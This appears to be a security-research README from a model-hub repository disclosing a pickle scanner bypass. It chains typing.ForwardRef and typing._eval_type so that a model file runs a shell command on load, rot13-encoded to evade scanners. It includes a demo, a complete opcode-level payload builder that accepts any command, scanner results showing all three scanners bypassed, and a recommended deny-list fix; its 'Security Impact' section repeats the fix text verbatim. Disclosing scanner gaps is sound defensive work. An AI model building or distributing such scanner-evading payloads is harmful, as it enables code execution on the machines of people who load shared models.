This repository contains a proof-of-concept exploit payload for security research purposes. Access to the pickle payload and PoC code requires acknowledgement of responsible use. By requesting access, you confirm you are a security researcher, penetration tester, or student using this material for defensive/educational purposes only.


typing.ForwardRef + _eval_type — Eval Chain

Security Research — Responsible Disclosure

This repository is part of a systematic study of pickle scanner bypass techniques. The payload demonstrates a detection gap in ML model security scanners. Access to malicious_model.pkl and poc.py requires a request — see gate above.

Summary

Scanner scores for malicious_model.pkl:

Scanner              CRITICAL   WARNING   Bypassed?
modelaudit 0.2.37    0          2         Yes — 0 CRITICAL
picklescan 1.0.4     0          0         Yes
modelscan            0          0         Yes

Vulnerability

typing.ForwardRef is designed for forward references in type annotations. It stores a string expression and compiles it to a code object via compile(). When typing._eval_type(ref, globalns, localns) is called, it evaluates the stored expression via eval(expr, globalns, localns). Because eval() injects __builtins__ into any globals dict that lacks it, __import__ is available even when both namespaces are empty.
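The chain reproduces outside pickle entirely. A minimal sketch (the echo command is illustrative; note that os.system() returns an int, so typing's post-eval type check raises TypeError after the command has already run):

import typing

# ForwardRef.__init__ compiles the string via compile(arg, '<string>', 'eval')
ref = typing.ForwardRef("__import__('os').system('echo eval chain fired')")

try:
    # _eval_type() -> ref._evaluate() -> eval(code, {}, {}); eval() injects
    # __builtins__ into the empty globals, so __import__ resolves
    typing._eval_type(ref, None, None)
except TypeError:
    pass  # raised only after the shell command has executed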

Neither typing.ForwardRef nor typing._eval_type is in ALWAYS_DANGEROUS_FUNCTIONS. The typing module has many legitimate uses in ML model metadata and cannot be wholesale banned.


Proof of Concept

malicious_model.pkl in this repository is the exploit payload. poc.py builds and tests it with full scanner output.

How the PoC was built

import codecs

def build(cmd: str) -> bytes:
    # expression that typing._eval_type will eval() at load time
    payload_expr = f"__import__('os').system('{cmd}')"
    # rot13 so the expression never appears as readable text in the pickle bytes
    rot13_expr   = codecs.encode(payload_expr, "rot_13")

    # PROTO opcode + protocol 4 (needed for STACK_GLOBAL / SHORT_BINUNICODE)
    ops = bytearray(b"\x80\x04")
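The builder is truncated above. Purely as a hedged reconstruction (assuming the three-step structure documented under "Pickle Structure" below; the shipped poc.py may well differ), the full opcode assembly could look like this:

import codecs

def _unicode(s: str) -> bytes:
    b = s.encode("utf-8")
    return b"\x8c" + bytes([len(b)]) + b               # SHORT_BINUNICODE (len < 256)

def _stack_global(module: str, name: str) -> bytes:
    return _unicode(module) + _unicode(name) + b"\x93" # STACK_GLOBAL

def build(cmd: str) -> bytes:
    payload_expr = f"__import__('os').system('{cmd}')"
    rot13_expr   = codecs.encode(payload_expr, "rot_13")

    ops = bytearray(b"\x80\x04")                       # PROTO 4

    # Step 1: payload_expr = _codecs.encode(rot13_expr, 'rot_13')  [safe-listed]
    ops += _stack_global("_codecs", "encode")
    ops += _unicode(rot13_expr) + _unicode("rot_13")
    ops += b"\x86R"                                    # TUPLE2, REDUCE
    ops += b"\x940"                                    # MEMOIZE -> memo[0], POP

    # Step 2: ref = typing.ForwardRef(payload_expr)
    ops += _stack_global("typing", "ForwardRef")
    ops += b"h\x00"                                    # BINGET 0: payload_expr
    ops += b"\x85R"                                    # TUPLE1, REDUCE
    ops += b"\x940"                                    # MEMOIZE -> memo[1], POP

    # Step 3: typing._eval_type(ref, None, None); eval() fires inside REDUCE
    ops += _stack_global("typing", "_eval_type")
    ops += b"h\x01"                                    # BINGET 1: ref
    ops += b"NN"                                       # None, None
    ops += b"\x87R."                                   # TUPLE3, REDUCE, STOP
    return bytes(ops)

Loading build('touch /tmp/scanner_bypass_proof.txt') with pickle.loads() runs the command during the final REDUCE. In this reconstruction, typing's post-eval type check then raises TypeError because os.system() returns an int; the shipped payload presumably sidesteps that, since the writeup notes the return value of pickle.loads() looks like a normal object.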

Affected file formats

Pickle (.pkl, .pt, .bin, .joblib) — any file deserialized via pickle.loads(), torch.load(), joblib.load(), or equivalent.

Conditions required to trigger

  1. Target calls pickle.loads(untrusted_bytes) or loads a model file via any pickle-based loader
  2. The scanner performs static analysis only (no sandboxed execution)
  3. Scanner checks GLOBAL/STACK_GLOBAL opcodes against a deny list (a minimal sketch of this approach follows the list)
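Not any scanner's actual code, but a minimal sketch of the deny-list check in condition 3, with illustrative entries, showing why the typing chain passes:

import pickletools

DENY = {("os", "system"), ("posix", "system"), ("builtins", "eval"),
        ("builtins", "exec"), ("subprocess", "Popen")}  # illustrative entries only

def scan(data: bytes):
    ops = list(pickletools.genops(data))
    findings = []
    for i, (op, arg, pos) in enumerate(ops):
        if op.name == "GLOBAL":                        # arg is "module name"
            module, name = arg.split(" ", 1)
        elif op.name == "STACK_GLOBAL" and i >= 2:     # simplification: assume the
            module, name = ops[i-2][1], ops[i-1][1]    # two prior ops pushed strings
        else:
            continue
        if (module, name) in DENY:
            findings.append((pos, f"{module}.{name}"))
    return findings

# The payload's only imports are _codecs.encode (safe-listed), typing.ForwardRef,
# and typing._eval_type; none is in DENY, so scan() returns [].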

Reproduction Steps

# 1. Request access above, then clone
git clone https://huggingface.co/SiggytheShark/pickle-bypass-typing-forwardref-eval
cd pickle-bypass-typing-forwardref-eval

# 2. Install requirements
pip install modelaudit picklescan modelscan

# 3. Scan — observe scanner scores match table above
modelaudit scan malicious_model.pkl
picklescan --path malicious_model.pkl
modelscan -p malicious_model.pkl

# 4. Execute to confirm RCE/side-effect
python3 poc.py

# 5. Verify
ls /tmp/scanner_bypass_proof.txt

Security Impact

Add "typing.ForwardRef" and "typing._eval_type" to ALWAYS_DANGEROUS_FUNCTIONS. These have no legitimate ML pickle use β€” forward references are resolved at import time, not during deserialization.

Bypass mechanism: The payload evades static analysis while achieving its effect (code execution, file write, or network connection) when pickle.loads() is called.

Real-world scenario: An attacker uploads this payload to a model hub. A victim downloads and loads it. The scanner reports the file as safe (0 CRITICAL). The payload fires silently — the return value of pickle.loads() looks like a normal Python object while the side effect has already occurred.
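In loader terms (a sketch; the filename matches this repo's payload, and any pickle-based loader such as torch.load() behaves the same way):

import pickle

with open("malicious_model.pkl", "rb") as f:
    model = pickle.load(f)  # the embedded command runs during deserialization
# Whatever pickle.load() returned (or raised), the side effect, e.g. the file
# /tmp/scanner_bypass_proof.txt, already exists by this line.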


Full Technical Writeup

typing.ForwardRef + _eval_type — Eval Chain

Score: 0 CRITICAL, 2 WARNING
Technique: Compile-then-eval chain via typing's type annotation machinery
Scanner version: modelaudit 0.2.37

Mechanism

typing.ForwardRef is designed for forward references in type annotations. It stores a string expression and compiles it to a code object via compile(). When typing._eval_type(ref, globalns, localns) is called, it evaluates the stored expression via eval(expr, globalns, localns). Because eval() injects __builtins__ into any globals dict that lacks it, __import__ is available even when both namespaces are empty.

Neither typing.ForwardRef nor typing._eval_type is in ALWAYS_DANGEROUS_FUNCTIONS. The typing module has many legitimate uses in ML model metadata and cannot be wholesale banned.

Pickle Structure

_codecs.encode(rot13_expr, 'rot_13')    → payload_expr      [0 findings — SAFE_GLOBALS]
typing.ForwardRef(payload_expr)         → ref object        [WARNING 1]
typing._eval_type(ref, None, None)      → eval fires → RCE  [WARNING 2]

The payload expression is rot13-encoded in the pickle. _codecs.encode (SAFE_GLOBALS) decodes it at runtime. The strings __import__, os, system, and the command never appear as readable text in the pickle bytes.
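One way to see exactly what a static scanner sees is to disassemble the opcode stream with the standard library (disassembly does not execute anything):

import pickletools

with open("malicious_model.pkl", "rb") as f:
    pickletools.dis(f.read())
# The listing shows only _codecs/typing STACK_GLOBALs and rot13 text pushes;
# 'os', 'system', and the command itself never appear in readable form.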

Why Scanners Miss It

  • typing.ForwardRef and typing._eval_type are not in any ban list
  • The rot13 obfuscation hides the eval expression from string pattern matching
  • _codecs.encode is explicitly safe-listed (0 findings for the decode step)

Recommended Fix

Add "typing.ForwardRef" and "typing._eval_type" to ALWAYS_DANGEROUS_FUNCTIONS. These have no legitimate ML pickle use β€” forward references are resolved at import time, not during deserialization.


